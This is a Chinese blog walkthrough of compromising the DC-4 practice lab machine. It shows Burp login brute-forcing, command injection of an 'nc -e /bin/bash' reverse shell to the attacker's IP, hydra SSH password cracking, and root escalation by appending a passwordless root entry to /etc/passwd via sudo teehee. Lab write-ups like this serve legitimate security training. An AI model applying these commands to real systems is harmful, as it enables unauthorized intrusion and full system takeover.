DC-4 靶机

本文详细描述了一次黑客攻击过程,包括使用burpsuite进行网页登录爆破,修改数据包实现反弹shell,通过hydra破解SSH密码,以及利用sudo提权并添加root用户。展示了攻击者逐步获取系统控制的步骤。
摘要由CSDN通过智能技术生成

DC_4

信息搜集

存活检测

image-20231022204049659

详细扫描

image-20231022204104264

后台网页扫描

image-20231022204121041

网页信息搜集

image-20231022204148961

只有一个登陆界面

漏洞利用

  • 尝试使用 burpsuite 密码爆破

    尝试使用用户名 admin 登录管理员页面

  • 成功爆破出密码 happy

    image-20231022205656115

  • 登录管理员页面

    显示可以使用命令

    image-20231022205749930

  • 但只能使用三个命令

    image-20231022205835140

  • 继续使用 bp 拦截查看数据包

    发送到 Repeater 中进行调试

    image-20231022210030615

  • 可以观察到列出当前文件的指令铭文显示在 POST 传参中

    查看命令本应为 ls -l 而参数中的命令为 ls+-1,猜测此处应该使用 + 代替了空格

  • 尝试将命令修改为连接反弹 shell 的 命令

  • kali 开启 nc 监听

    nc -lvvp 7777
    
  • 将抓取的命令修改为

    nc+-e+/bin/bash+10.4.7.146+7777
    

    image-20231022210941206

  • 成功反弹

    image-20231022210959775

ssh 密码爆破

  • 搜集有用信息

    在/home/jim/backups 目录下发现了旧密码文件

    image-20231022211410659

  • 将密码文件保存

  • 靶机开启 http 上传

    python3 -m http.server 8888
    

    image-20231022211612326

  • kali 下载旧密码文件

    wget http://10.4.7.148:8888/old-passwords.bak
    

    image-20231022211648896

  • hydra 密码爆破

    hydra -l jim -P old-passwords.bak ssh://10.4.7.148 -vV -f -I
    
  • 成功爆破出 jim 的密码 jibril04

  • 登录

    ssh jim@10.4.7.148
    

    image-20231022212144918

提权

  • 尝试 sudo -l

    无 root 权限

    image-20231022212312307

  • 返回查看到登陆后收到了一封邮件

    image-20231022212630510

  • 查看邮箱

    image-20231022212730316

  • 邮箱是 Charles 发来的,并告知了他的密码 ^xHhA&hvim0y

  • 切换用户

  • 成功切换,sudo -l 查看权限

    image-20231022212947507

  • 可以使用 teehee 命令

  • 查看 teehee 命令的使用方式

    teehee --help
    

    image-20231022213311584

  • 帮助中显示使用 teehee -a <文件> 可以向文件中追加内容

  • 尝试向 /etc/passwd 文件中追加一条 root 用户

    sudo /usr/bin/teehee -a /etc/passwd 
    
    nb::0:0:root:/root:/bin/bash
    

    image-20231022213936715

  • 切换创建的用户

    su nb
    

    image-20231022214009533

    成功获取 root 权限

总结

  • burpsuite 网页登录爆破
  • burpsuite 拦截修改数据包
  • hydra 爆破 ssh 密码
  • sudo 提权
  • 向 /etc/passwd 文件添加 root 用户
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值